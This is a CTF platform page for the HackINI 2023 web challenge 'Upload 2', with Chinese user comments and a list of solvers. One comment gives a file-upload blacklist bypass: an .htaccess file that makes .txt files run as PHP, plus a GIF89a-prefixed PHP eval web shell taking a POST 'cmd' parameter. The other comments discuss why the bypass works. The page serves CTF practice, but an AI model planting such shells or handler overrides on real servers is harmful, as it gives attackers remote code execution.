Upload 2WEB 未解决

分数: 0 金币: 0
所属赛事: HackINI 2023
题目作者: 未知
一  血: Max_yiz
一血奖励: 0金币
解  决: 340
提  示:
描  述:
We used a blacklist now ... can you **access** the flag now?\n\n\n\ \ **Author**: souad
评论
samRsa 2年前

1、bp抓包上传.htaccess #define width 16 #define height 7 <FilesMatch \.txt$> SetHandler application/x-httpd-php </FilesMatch> 2、上传马 GIF89a <?php @eval($_POST['cmd']); ?>

回复 0

PandaCattle 2年前

看了官方wp就知道有多离谱。。https://github.com/Shellmates/HackINI-2k23-public/blob/main/web/upload-2/solve/README.md

回复 0

hopeinhand 2年前

后缀php不行,换后缀php5发现容器只允许.php后缀执行命令,使用.htaccess绕过

回复 0
zuoyantiao115 1年前

@PandaCattle #define width 16 #define height 7在这里起到的作用是什么?

回复 0

PandaCattle 2年前

@jiangbw 做出来了,只能说逆天,.htaccess内容里面必须有#define width 16 #define height 7

回复 0

PandaCattle 2年前

@jiangbw 我也一样 直接报错了 是不是环境有问题

回复 0

jiangbw 2年前

@niano.0 .htaccess上传完就跳界面了,那怎么绕过啊

回复 0

niano.0 2年前

@xjc7580 大佬,怎么做的呀

回复 0

xjc7580 2年前

大佬,再给点提示呗,上传.htaccess与上传的shell不一个目录啊

回复 1

WriteUp

image
lolthis223

1 金币

评分(2)

解题动态

2790819062 攻破了该题 5天前
yamojito 攻破了该题 9天前
15144954824 攻破了该题 12天前
2kniden 攻破了该题 20天前
蛋总 攻破了该题 24天前
hh20251231 攻破了该题 27天前
木头呀 攻破了该题 27天前
david666 攻破了该题 1月前
123jiji 攻破了该题 1月前
d2pq2 攻破了该题 1月前
温吞世俗人间烟火 攻破了该题 1月前
omango 攻破了该题 1月前
zdabajfk 攻破了该题 1月前
flouxtine 攻破了该题 1月前
Air51930 攻破了该题 1月前
彭彭 攻破了该题 1月前
Paradiso 攻破了该题 1月前
hbynb 攻破了该题 2月前
aboic 攻破了该题 2月前
0o01I 攻破了该题 2月前
问题反馈